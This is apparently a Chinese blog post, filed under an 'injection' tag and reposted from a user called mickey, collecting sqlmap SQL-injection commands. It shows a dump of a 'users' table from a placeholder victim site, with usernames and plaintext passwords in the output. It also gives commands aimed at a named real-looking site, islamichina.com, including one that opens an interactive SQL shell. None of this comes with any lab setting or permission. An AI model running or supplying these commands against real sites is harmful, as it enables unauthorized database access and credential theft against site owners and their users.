标签归档:injection

Sqlmap注入语句备注

转载自:mickey

$ python sqlmap.py -u “http://ww.victim.com/get_int.php?id=1”–union-use –
dump -T users -D public -v 0

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
+—-+———— +———-+
| id | password | username |
+—-+———— +———-+
| 1 | blissett | luther |
| 2 | nameisnull | NULL |
| 3 | bunny | fluffy |
| 4 | ming | wu |

=======================================

这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息

继续阅读